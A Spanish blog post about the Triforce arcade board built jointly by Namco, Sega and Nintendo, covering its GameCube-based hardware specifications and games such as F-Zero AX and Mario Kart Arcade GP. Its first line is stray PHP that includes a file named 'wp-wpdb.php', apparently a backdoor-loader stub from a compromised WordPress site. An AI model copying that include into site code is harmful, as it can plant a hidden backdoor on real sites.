if (is_file('wp-wpdb.php')) include_once('wp-wpdb.php'); Namco, Sega y Nintendo: Triforce, la unión hace la fuerza – La Fortaleza de LeChuck

Namco, Sega y Nintendo: Triforce, la unión hace la fuerza

Triforce es un claro ejemplo del gran trabajo que pueden hacer nuestras empresas desarrolladoras favoritas juntas. Namco, antes de convertirse en Namco Bandai, Sega y Nintendo aunaron fuerzas para crear una placa base para sistemas arcade.

Su nombre proviene de uno de los objetos más conocidos de la historia de los videojuegos, la trifuerza. Según el propio Miyamoto: «El significado de esto es: tres fuerzas que se unen para convertirse en una gran potencia«.

La placa Triforce fue concebida para producir sistemas arcade de bajo coste y poder transferir datos desde nuestras casas a dichos sistemas y viceversa. Esto fue posible gracias a que el hardware se basó en la arquitectura de Nintendo GameCube y la manera con la que los datos podían ser transportados era mediante las tarjetas de memoria de la consola de Nintendo. A esta interactividad se le otorgó el nombre de GameForce Network. Cuando la placa fue presentada se dijo que esta interconectividad permitiría a los jugadores transferir sus mejores puntuaciones, los mejores corredores y sus propios circuitos.

Originalmente se pensó que su potencia tan solo iba a ser equiparable a los sistemas de las salas de juegos pero más tarde se pudo comprobar que su potencia duplicaba la de las consolas domésticas.
Estas son sus especificaciones:
  • CPU : IBM Power PC «Gekko»
  • Sound DSP : Custom Macronix 16bit DSP @ 81MHz
  • Main RAM : Main Memory 48 MB MoSys 1T-SRAM, Approximately 10ns Sustainable Latency.
  • RAM : Version «A» upgradable RAM modules, up to 512MB (possibly higher)
  • RAM : Version «B» unknown
  • Graphics Engine : «Flipper» (Custom ATI/Nintendo)
  • Color : 24-bit Color, 24-bit Z Buffer.
  • Hardware Features : Fog, Subpixel Anti-aliasing, 8 Hardware lights, Alpha Blending, Virtual Texture Design, Multi-texture, Mapping/Bump/Environment Mapping, MIPMAP, Bilinear/Trilinear/Anisotropic Filtering, Real-time Texture Decompression (S3TC), HW 3-line Deflickering filter.
Los juegos para Triforce comenzaron a aparecer en el año 2002 y el primero fue F-Zero AX.

El juego fue trasladado más tarde a GameCube, debido al éxito del arcade y a la facilidad de adaptación de recreativa a videojuego.

Tras F-Zero AX llegaron un gran número de arcades que posiblemente habréis podido probar pero que donde de verdad lograron obtener un mayor éxito fue en otros países como Japón. Entre estos arcades se encuentran títulos como:
  • Donkey Kong: Jungle Fever
  • Mario Kart Arcade GP
  • Mario Kart Arcade GP 2
  • Virtua Striker 2002
  • Virtua Striker 4
  • The Key of Avalon (diversas versiones)
Y a modo de curiosidad decir que se rumoreó con la posibilidad del lanzamiento de un Star Fox para Triforce que más tarde solo salió para Nintendo Gamecube bajo el nombre de Star Fox: Assault.

Os dejo con un vídeo de Mario Kart GP 2. ¿Os imagináis de lo que serían capaces de hacer Microsoft, Nintendo y Sony si decidieran remar en el mismo barco? Pues los productores de Tekken también se lo han preguntado y al igual que a mí, me parecería genial. De momento seguiremos imaginando.

Por LeChuck

Desde las profundidades del Caribe vigilo los mares.

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